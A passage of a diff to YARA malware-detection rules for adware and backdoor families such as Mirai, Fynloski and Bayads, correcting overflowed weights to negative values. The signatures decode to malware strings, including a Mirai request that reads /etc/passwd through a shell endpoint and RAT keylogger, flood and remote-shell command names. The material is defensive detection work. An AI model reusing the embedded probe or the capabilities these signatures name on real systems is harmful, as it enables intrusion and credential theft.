$a_03_55 = {8a 14 1a 8a c2 02 c0 02 d0 c0 e2 90 01 01 80 fa 90 01 01 7d 90 00 } //1
|
||||
$a_10_56 = {00 00 e6 49 f8 07 33 da e1 fe 39 ca b5 e4 00 04 00 80 80 10 00 00 1b 8c 77 12 57 d0 9a 83 ec 0f 7c a9 30 04 00 80 80 10 00 00 ff 53 0d 1b 60 93 84 fb 37 d2 fe 7f 00 04 00 80 80 10 00 00 8c b4 5a 2f dc 72 d7 a2 b5 f1 dd f4 00 10 00 80 80 10 00 00 ad ab 04 3a 63 34 6f c9 ed e9 10 79 00 10 00 80 80 10 00 00 6c 99 0d 52 a0 27 79 5f 04 c1 49 1d 00 10 00 80 80 10 00 00 a0 3d 6a 6a ec 2e } //0
|
||||
$a_56_57 = {8d 00 04 00 80 80 10 00 00 dc 1e 8f 6b 91 1c 2c bb 54 cd a2 1b 00 04 00 80 80 10 00 00 1f 1a c7 85 1f 9c 2a a2 39 bd 7f ae 00 04 00 80 80 10 00 00 f3 f9 4c 90 8c 7b 56 b7 b0 be d5 f1 00 04 00 80 80 10 00 00 f3 f9 4c 90 8c 7b 56 b7 f2 4d d1 72 00 04 00 80 80 10 00 00 3e 78 ea a3 fc e6 e1 68 36 93 81 ad 00 04 00 80 80 10 00 00 d0 6f 08 bc 6f 6c 94 50 62 b7 b9 5a 00 10 00 80 80 10 00 00 26 81 e5 be ec 2f 8b 68 93 c9 b3 e8 00 20 00 00 80 10 00 00 3f 17 7f c6 1f 4a 60 f5 98 e8 5b 97 00 20 00 00 80 10 00 00 a8 76 8a cd 3b f1 cc 5b f8 f1 2d 7c 00 10 00 80 80 10 00 00 c5 c4 e4 d4 6b 09 92 5f 4c aa 16 99 00 04 00 80 80 10 00 00 dd 07 b8 e9 73 ca ce 62 54 69 4a a4 00 04 00 80 } //17418
|
||||
$a_ef_59 = {0b ee 71 6f 1d d0 c5 00 10 00 80 80 10 00 00 1e fe 7c f6 21 ed 48 88 54 24 ca 00 00 20 00 00 80 10 00 00 db dc b1 fc ca aa c7 fc 9f fd aa d2 20 04 00 80 87 10 00 00 a4 11 d7 2f 34 21 df b8 8b 3e 35 1f 3f e6 01 00 87 10 00 00 db 48 ae 35 18 99 ac 41 e7 d3 d9 fb 3a a5 02 00 87 10 00 00 91 fe 42 3a fc 8c 0e 5a 73 73 48 17 b9 f7 14 00 87 10 00 00 5c 2f 2d 48 52 39 86 f5 70 3b a7 26 e2 bb 04 00 87 10 } //51304
|
||||
$a_ef_59 = {0b ee 71 6f 1d d0 c5 00 10 00 80 80 10 00 00 1e fe 7c f6 21 ed 48 88 54 24 ca 00 00 20 00 00 80 10 00 00 db dc b1 fc ca aa c7 fc 9f fd aa d2 20 04 00 80 87 10 00 00 a4 11 d7 2f 34 21 df b8 8b 3e 35 1f 3f e6 01 00 87 10 00 00 db 48 ae 35 18 99 ac 41 e7 d3 d9 fb 3a a5 02 00 87 10 00 00 91 fe 42 3a fc 8c 0e 5a 73 73 48 17 b9 f7 14 00 87 10 00 00 5c 2f 2d 48 52 39 86 f5 70 3b a7 26 e2 bb 04 00 87 10 } //-14232
|
||||
$a_ca_60 = {4b e7 f0 a4 74 } //0
|
||||
condition:
|
||||
((#a_11_0 & 1)*800+(#a_63_1 & 1)*3584+(#a_00_3 & 1)*111+(#a_00_5 & 1)*110+(#a_61_6 & 1)*6144+(#a_11_8 & 1)*30+(#a_62_9 & 1)*6144+(#a_11_11 & 1)*30+(#a_62_12 & 1)*8192+(#a_00_14 & 1)*111+(#a_00_15 & 1)*100+(#a_00_17 & 1)*101+(#a_00_18 & 1)*121+(#a_00_20 & 1)*101+(#a_00_21 & 1)*101+(#a_65_22 & 1)*18262+(#a_67_23 & 1)*24936+(#a_6f_24 & 1)*28532+(#a_2e_25 & 1)*3584+(#a_6b_26 & 1)*17494+(#a_71_27 & 1)*16726+(#a_00_28 & 1)*32+(#a_00_30 & 1)*118+(#a_00_32 & 1)*115+(#a_00_34 & 1)*47+(#a_00_35 & 1)*110+(#a_1a_36 & 1)*34817+(#a_8b_37 & 1)*13059+(#a_00_39 & 1)*101+(#a_00_41 & 1)*116+(#a_00_43 & 1)*114+(#a_00_44 & 1)*108+(#a_76_45 & 1)*6656+(#a_00_47 & 1)*108+(#a_00_48 & 1)*105+(#a_00_49 & 1)*278+(#a_70_50 & 1)*19286+(#a_56_51 & 1)*16174+(#a_40_52 & 1)*5256+(#a_01_53 & 1)*1+(#a_01_54 & 1)*1+(#a_03_55 & 1)*1+(#a_10_56 & 1)*0+(#a_56_57 & 1)*17418+(#a_ef_59 & 1)*51304+(#a_ca_60 & 1)*0) >=832
|
||||
((#a_11_0 & 1)*800+(#a_63_1 & 1)*3584+(#a_00_3 & 1)*111+(#a_00_5 & 1)*110+(#a_61_6 & 1)*6144+(#a_11_8 & 1)*30+(#a_62_9 & 1)*6144+(#a_11_11 & 1)*30+(#a_62_12 & 1)*8192+(#a_00_14 & 1)*111+(#a_00_15 & 1)*100+(#a_00_17 & 1)*101+(#a_00_18 & 1)*121+(#a_00_20 & 1)*101+(#a_00_21 & 1)*101+(#a_65_22 & 1)*18262+(#a_67_23 & 1)*24936+(#a_6f_24 & 1)*28532+(#a_2e_25 & 1)*3584+(#a_6b_26 & 1)*17494+(#a_71_27 & 1)*16726+(#a_00_28 & 1)*32+(#a_00_30 & 1)*118+(#a_00_32 & 1)*115+(#a_00_34 & 1)*47+(#a_00_35 & 1)*110+(#a_1a_36 & 1)*-30719+(#a_8b_37 & 1)*13059+(#a_00_39 & 1)*101+(#a_00_41 & 1)*116+(#a_00_43 & 1)*114+(#a_00_44 & 1)*108+(#a_76_45 & 1)*6656+(#a_00_47 & 1)*108+(#a_00_48 & 1)*105+(#a_00_49 & 1)*278+(#a_70_50 & 1)*19286+(#a_56_51 & 1)*16174+(#a_40_52 & 1)*5256+(#a_01_53 & 1)*1+(#a_01_54 & 1)*1+(#a_03_55 & 1)*1+(#a_10_56 & 1)*0+(#a_56_57 & 1)*17418+(#a_ef_59 & 1)*-14232+(#a_ca_60 & 1)*0) >=832
|
||||
|
||||
}
|
||||
rule Adware_Win32_AdRotator_37{
|
||||
|
|
|
|||
|
|
@ -19,10 +19,10 @@ rule Adware_Win32_Bayads_2{
|
|||
$a_01_0 = {70 72 64 63 74 3d 24 7b 6d 6d 70 72 64 63 74 7d 26 74 6c 62 72 49 64 3d 62 61 73 65 26 61 66 6c 74 3d 24 7b 61 66 6c 74 49 64 7d 26 69 6e 73 74 6c 44 61 74 65 3d 24 7b 69 6e 73 74 6c 44 61 79 7d 26 76 72 73 6e 3d 24 7b 76 72 73 6e 7d 26 69 6e 73 74 6c 52 65 66 3d 24 7b 69 6e 73 74 6c 52 65 66 7d } //1 prdct=${mmprdct}&tlbrId=base&aflt=${afltId}&instlDate=${instlDay}&vrsn=${vrsn}&instlRef=${instlRef}
|
||||
$a_03_1 = {73 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 2e 00 6d 00 6f 00 6e 00 74 00 69 00 65 00 72 00 61 00 2e 00 63 00 6f 00 6d 00 2f 00 72 00 65 00 70 00 6f 00 72 00 74 00 73 00 2f 00 6a 00 73 00 43 00 6e 00 74 00 2e 00 73 00 72 00 66 00 3f 00 72 00 69 00 64 00 3d 00 63 00 72 00 61 00 73 00 68 00 5f 00 63 00 6e 00 70 00 79 00 5f 00 25 00 73 00 5f 00 25 00 78 00 5f 00 25 00 78 00 90 02 02 25 00 73 00 5d 00 26 00 68 00 61 00 72 00 64 00 49 00 64 00 3d 00 25 00 73 00 90 00 } //1
|
||||
$a_03_2 = {63 72 72 55 6e 69 73 6e 74 6c 44 73 70 6c 79 3d 90 02 10 63 72 72 44 73 70 6c 79 3d 90 02 0f 70 72 64 63 74 55 6e 69 6e 73 74 3d 90 02 0f 61 70 70 73 3d 90 00 } //1
|
||||
$a_03_3 = {73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 02 80 6c 61 62 65 6c 3d 90 00 } //65526
|
||||
$a_03_4 = {5b 6d 61 69 6e 5d 0d 0a 65 70 3d 90 02 10 65 70 49 44 3d 90 01 50 90 02 80 73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 00 } //65526
|
||||
$a_01_5 = {34 30 36 31 39 34 37 46 2d 46 35 34 46 2d 34 39 31 32 2d 39 32 32 43 2d 31 36 32 34 46 45 42 38 37 34 36 46 } //65526 4061947F-F54F-4912-922C-1624FEB8746F
|
||||
$a_03_3 = {73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 02 80 6c 61 62 65 6c 3d 90 00 } //-10
|
||||
$a_03_4 = {5b 6d 61 69 6e 5d 0d 0a 65 70 3d 90 02 10 65 70 49 44 3d 90 01 50 90 02 80 73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 00 } //-10
|
||||
$a_01_5 = {34 30 36 31 39 34 37 46 2d 46 35 34 46 2d 34 39 31 32 2d 39 32 32 43 2d 31 36 32 34 46 45 42 38 37 34 36 46 } //-10 4061947F-F54F-4912-922C-1624FEB8746F
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*65526+(#a_03_4 & 1)*65526+(#a_01_5 & 1)*65526) >=3
|
||||
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*-10+(#a_03_4 & 1)*-10+(#a_01_5 & 1)*-10) >=3
|
||||
|
||||
}
|
||||
|
|
@ -24,10 +24,10 @@ rule Adware_Win32_Cjishu_2{
|
|||
$a_80_2 = {6d 69 6e 69 2e 6c 6d 69 66 65 6e 67 2e 63 6f 6d } //mini.lmifeng.com 1
|
||||
$a_80_3 = {69 70 64 66 72 65 61 64 65 72 74 6f 6f 6c 73 41 70 70 } //ipdfreadertoolsApp 1
|
||||
$a_80_4 = {53 6f 66 74 77 61 72 65 5c 69 50 64 66 52 65 61 64 65 72 5c } //Software\iPdfReader\ 1
|
||||
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
|
||||
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 65 72 2e 65 78 65 } //Uninstaller.exe 65436
|
||||
$a_80_7 = {55 6e 69 6e 73 74 61 6c 2e 65 78 65 } //Uninstal.exe 65436
|
||||
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
|
||||
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 65 72 2e 65 78 65 } //Uninstaller.exe -100
|
||||
$a_80_7 = {55 6e 69 6e 73 74 61 6c 2e 65 78 65 } //Uninstal.exe -100
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436+(#a_80_7 & 1)*65436) >=5
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100+(#a_80_7 & 1)*-100) >=5
|
||||
|
||||
}
|
||||
|
|
@ -921,9 +921,9 @@ rule Adware_Win32_Hotbar_47{
|
|||
$a_01_1 = {73 65 65 6b 6d 6f 73 61 7c 7a 61 6e 67 6f 73 61 7c 73 62 75 73 61 7c 68 6f 74 62 61 72 73 61 } //1 seekmosa|zangosa|sbusa|hotbarsa
|
||||
$a_01_2 = {53 6f 66 74 77 61 72 65 5c 5a 61 6e 67 6f } //1 Software\Zango
|
||||
$a_01_3 = {31 38 30 73 65 61 72 63 68 20 41 73 73 69 73 74 61 6e 74 } //1 180search Assistant
|
||||
$a_01_4 = {65 00 41 00 63 00 63 00 65 00 6c 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 43 00 6f 00 72 00 70 00 } //65532 eAcceleration Corp
|
||||
$a_01_4 = {65 00 41 00 63 00 63 00 65 00 6c 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 43 00 6f 00 72 00 70 00 } //-4 eAcceleration Corp
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*65532) >=3
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*-4) >=3
|
||||
|
||||
}
|
||||
rule Adware_Win32_Hotbar_48{
|
||||
|
|
|
|||
|
|
@ -233,9 +233,9 @@ rule Adware_Win32_Lollipop_17{
|
|||
$a_01_7 = {3f 41 56 6f 62 66 63 6c 73 33 40 40 } //1 ?AVobfcls3@@
|
||||
$a_01_8 = {3f 41 56 6f 62 66 63 6c 73 35 40 40 } //1 ?AVobfcls5@@
|
||||
$a_01_9 = {3f 41 56 6f 62 66 63 6c 73 38 40 40 } //1 ?AVobfcls8@@
|
||||
$a_01_10 = {54 68 65 20 76 61 6c 75 65 20 6f 66 20 45 53 50 20 77 61 73 20 6e 6f 74 20 70 72 6f 70 65 72 6c 79 } //65526 The value of ESP was not properly
|
||||
$a_01_10 = {54 68 65 20 76 61 6c 75 65 20 6f 66 20 45 53 50 20 77 61 73 20 6e 6f 74 20 70 72 6f 70 65 72 6c 79 } //-10 The value of ESP was not properly
|
||||
condition:
|
||||
((#a_01_0 & 1)*9+(#a_01_1 & 1)*9+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*65526) >=21
|
||||
((#a_01_0 & 1)*9+(#a_01_1 & 1)*9+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*-10) >=21
|
||||
|
||||
}
|
||||
rule Adware_Win32_Lollipop_18{
|
||||
|
|
|
|||
|
|
@ -113,8 +113,8 @@ rule Adware_Win32_Loudmo_8{
|
|||
$a_01_12 = {62 61 62 65 6c 66 69 73 68 6e 65 74 77 6f 72 6b 2e 63 6f 6d 2f 42 61 62 79 6c 6f 6e } //1 babelfishnetwork.com/Babylon
|
||||
$a_01_13 = {69 62 61 62 65 6c 66 69 73 68 2e 63 6f 6d 2f 42 61 62 79 6c 6f 6e } //1 ibabelfish.com/Babylon
|
||||
$a_01_14 = {42 69 6e 67 54 6f 6f 6c 62 61 72 2d 6c 6f 75 64 6d 6f 2e 65 78 65 } //1 BingToolbar-loudmo.exe
|
||||
$a_01_15 = {72 65 67 69 73 74 65 72 40 68 61 76 69 6e 67 66 75 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d } //65436 register@havingfunonline.com
|
||||
$a_01_15 = {72 65 67 69 73 74 65 72 40 68 61 76 69 6e 67 66 75 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d } //-100 register@havingfunonline.com
|
||||
condition:
|
||||
((#a_01_0 & 1)*50+(#a_03_1 & 1)*5+(#a_01_2 & 1)*2+(#a_01_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*65436) >=56
|
||||
((#a_01_0 & 1)*50+(#a_03_1 & 1)*5+(#a_01_2 & 1)*2+(#a_01_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*-100) >=56
|
||||
|
||||
}
|
||||
|
|
@ -11,10 +11,10 @@ rule Backdoor_Linux_Mirai_B{
|
|||
$a_80_4 = {51 5b 51 56 47 4f } //Q[QVGO 1
|
||||
$a_80_5 = {4c 41 4d 50 50 47 41 56 } //LAMPPGAV 1
|
||||
$a_80_6 = {41 4a 57 4c 49 47 46 } //AJWLIGF 1
|
||||
$a_01_7 = {47 45 54 20 2f 73 68 65 6c 6c 3f 63 61 74 25 25 32 30 2f 65 74 63 2f 70 61 73 73 77 64 } //65535 GET /shell?cat%%20/etc/passwd
|
||||
$a_01_8 = {47 45 54 20 2f 73 79 73 74 65 6d 2e 69 6e 69 3f 6c 6f 67 69 6e 75 73 65 26 6c 6f 67 69 6e 70 61 73 } //65535 GET /system.ini?loginuse&loginpas
|
||||
$a_01_7 = {47 45 54 20 2f 73 68 65 6c 6c 3f 63 61 74 25 25 32 30 2f 65 74 63 2f 70 61 73 73 77 64 } //-1 GET /shell?cat%%20/etc/passwd
|
||||
$a_01_8 = {47 45 54 20 2f 73 79 73 74 65 6d 2e 69 6e 69 3f 6c 6f 67 69 6e 75 73 65 26 6c 6f 67 69 6e 70 61 73 } //-1 GET /system.ini?loginuse&loginpas
|
||||
condition:
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_01_7 & 1)*65535+(#a_01_8 & 1)*65535) >=7
|
||||
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_01_7 & 1)*-1+(#a_01_8 & 1)*-1) >=7
|
||||
|
||||
}
|
||||
rule Backdoor_Linux_Mirai_B_2{
|
||||
|
|
|
|||
|
|
@ -10,8 +10,8 @@ rule Backdoor_Win32_Agent_CAB{
|
|||
$a_01_3 = {43 72 65 61 74 65 54 6f 6f 6c 68 65 6c 70 33 32 53 6e 61 70 73 68 6f 74 } //1 CreateToolhelp32Snapshot
|
||||
$a_01_4 = {43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 } //1 CreateRemoteThread
|
||||
$a_01_5 = {57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 } //1 WriteProcessMemory
|
||||
$a_01_6 = {5c 43 53 43 68 65 61 74 5c 44 72 69 76 65 72 } //65436 \CSCheat\Driver
|
||||
$a_01_6 = {5c 43 53 43 68 65 61 74 5c 44 72 69 76 65 72 } //-100 \CSCheat\Driver
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*65436) >=23
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*-100) >=23
|
||||
|
||||
}
|
||||
|
|
@ -20,8 +20,8 @@ rule Backdoor_Win32_CobaltStrikeLoader_CM_dha_2{
|
|||
$a_00_1 = {31 00 31 00 39 00 38 00 35 00 } //5 11985
|
||||
$a_00_2 = {43 00 6c 00 65 00 61 00 72 00 4d 00 79 00 54 00 72 00 61 00 63 00 6b 00 73 00 42 00 79 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 } //1 ClearMyTracksByProcess
|
||||
$a_00_3 = {41 00 6c 00 6c 00 6f 00 63 00 43 00 6f 00 6e 00 73 00 6f 00 6c 00 65 00 } //1 AllocConsole
|
||||
$a_00_4 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //65436 inetcpl.cpl
|
||||
$a_00_4 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //-100 inetcpl.cpl
|
||||
condition:
|
||||
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65436) >=11
|
||||
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -17,8 +17,8 @@ rule Backdoor_Win32_Delfsnif_gen_E{
|
|||
$a_00_10 = {56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 } //5 VirtualAllocEx
|
||||
$a_00_11 = {4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 58 50 20 35 2e 31 29 } //1 Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1)
|
||||
$a_00_12 = {53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 57 69 6e 6c 6f 67 6f 6e } //1 Software\Microsoft\Windows NT\CurrentVersion\Winlogon
|
||||
$a_01_13 = {41 6e 56 69 72 20 54 61 73 6b 20 4d 61 6e 61 67 65 72 } //65436 AnVir Task Manager
|
||||
$a_01_13 = {41 6e 56 69 72 20 54 61 73 6b 20 4d 61 6e 61 67 65 72 } //-100 AnVir Task Manager
|
||||
condition:
|
||||
((#a_00_0 & 1)*20+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*20+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_01_7 & 1)*5+(#a_01_8 & 1)*5+(#a_00_9 & 1)*5+(#a_00_10 & 1)*5+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_01_13 & 1)*65436) >=80
|
||||
((#a_00_0 & 1)*20+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*20+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_01_7 & 1)*5+(#a_01_8 & 1)*5+(#a_00_9 & 1)*5+(#a_00_10 & 1)*5+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_01_13 & 1)*-100) >=80
|
||||
|
||||
}
|
||||
|
|
@ -4,9 +4,9 @@ rule Backdoor_Win32_Forusfank_A{
|
|||
description = "Backdoor:Win32/Forusfank.A,SIGNATURE_TYPE_PEHSTR_EXT,ffffffbc 02 58 02 09 00 00 "
|
||||
|
||||
strings :
|
||||
$a_01_0 = {6d 69 72 61 6e 64 61 2d 69 6d 2e 6f 72 67 } //65236 miranda-im.org
|
||||
$a_01_1 = {70 69 64 67 69 6e 2d 64 65 76 65 6c 5c 70 69 64 67 69 6e 2d } //65236 pidgin-devel\pidgin-
|
||||
$a_01_2 = {6d 65 73 73 65 6e 67 65 72 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //65236 messenger@microsoft.com
|
||||
$a_01_0 = {6d 69 72 61 6e 64 61 2d 69 6d 2e 6f 72 67 } //-300 miranda-im.org
|
||||
$a_01_1 = {70 69 64 67 69 6e 2d 64 65 76 65 6c 5c 70 69 64 67 69 6e 2d } //-300 pidgin-devel\pidgin-
|
||||
$a_01_2 = {6d 65 73 73 65 6e 67 65 72 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //-300 messenger@microsoft.com
|
||||
$a_01_3 = {72 75 73 69 6e 66 6f 2e 65 78 65 } //200 rusinfo.exe
|
||||
$a_01_4 = {3c 6d 6c 20 6c 3d 22 31 22 3e 3c 64 20 6e 3d 22 68 6f 74 6d 61 69 6c 2e 63 6f 6d 22 3e 3c 63 20 6e 3d 22 25 73 22 20 6c 3d 22 33 22 } //200 <ml l="1"><d n="hotmail.com"><c n="%s" l="3"
|
||||
$a_01_5 = {7b 38 37 30 43 39 46 34 32 2d 30 43 41 44 2d 34 38 41 37 2d 38 37 41 45 2d 39 34 38 44 32 36 35 43 32 38 46 31 7d } //100 {870C9F42-0CAD-48A7-87AE-948D265C28F1}
|
||||
|
|
@ -14,6 +14,6 @@ rule Backdoor_Win32_Forusfank_A{
|
|||
$a_01_7 = {67 61 74 65 77 61 79 2e 64 6c 6c 3f 53 65 73 73 69 6f 6e 49 44 3d 25 73 } //50 gateway.dll?SessionID=%s
|
||||
$a_01_8 = {49 4c 54 58 43 21 34 49 58 42 35 46 42 2a 50 58 } //50 ILTXC!4IXB5FB*PX
|
||||
condition:
|
||||
((#a_01_0 & 1)*65236+(#a_01_1 & 1)*65236+(#a_01_2 & 1)*65236+(#a_01_3 & 1)*200+(#a_01_4 & 1)*200+(#a_01_5 & 1)*100+(#a_01_6 & 1)*100+(#a_01_7 & 1)*50+(#a_01_8 & 1)*50) >=600
|
||||
((#a_01_0 & 1)*-300+(#a_01_1 & 1)*-300+(#a_01_2 & 1)*-300+(#a_01_3 & 1)*200+(#a_01_4 & 1)*200+(#a_01_5 & 1)*100+(#a_01_6 & 1)*100+(#a_01_7 & 1)*50+(#a_01_8 & 1)*50) >=600
|
||||
|
||||
}
|
||||
|
|
@ -31,8 +31,8 @@ rule Backdoor_Win32_Fynloski_A_2{
|
|||
$a_01_9 = {44 44 4f 53 53 59 4e 46 4c 4f 4f 44 } //1 DDOSSYNFLOOD
|
||||
$a_01_10 = {44 44 4f 53 55 44 50 46 4c 4f 4f 44 } //1 DDOSUDPFLOOD
|
||||
$a_01_11 = {41 63 74 69 76 65 4f 66 66 6c 69 6e 65 4b 65 79 6c 6f 67 67 65 72 } //1 ActiveOfflineKeylogger
|
||||
$a_01_12 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //65526 Comet RAT Legacy is already active in your system
|
||||
$a_01_12 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //-10 Comet RAT Legacy is already active in your system
|
||||
condition:
|
||||
((#a_03_0 & 1)*2+(#a_01_1 & 1)*2+(#a_03_2 & 1)*2+(#a_03_3 & 1)*2+(#a_01_4 & 1)*2+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*65526) >=4
|
||||
((#a_03_0 & 1)*2+(#a_01_1 & 1)*2+(#a_03_2 & 1)*2+(#a_03_3 & 1)*2+(#a_01_4 & 1)*2+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*-10) >=4
|
||||
|
||||
}
|
||||
|
|
@ -20,8 +20,8 @@ rule Backdoor_Win32_Fynloski_R{
|
|||
$a_00_13 = {44 44 4f 53 53 59 4e 46 4c 4f 4f 44 } //1 DDOSSYNFLOOD
|
||||
$a_00_14 = {44 44 4f 53 55 44 50 46 4c 4f 4f 44 } //1 DDOSUDPFLOOD
|
||||
$a_00_15 = {41 43 54 49 56 45 52 45 4d 4f 54 45 53 48 45 4c 4c } //1 ACTIVEREMOTESHELL
|
||||
$a_01_16 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //65436 Comet RAT Legacy is already active in your system
|
||||
$a_01_16 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //-100 Comet RAT Legacy is already active in your system
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_01_16 & 1)*65436) >=6
|
||||
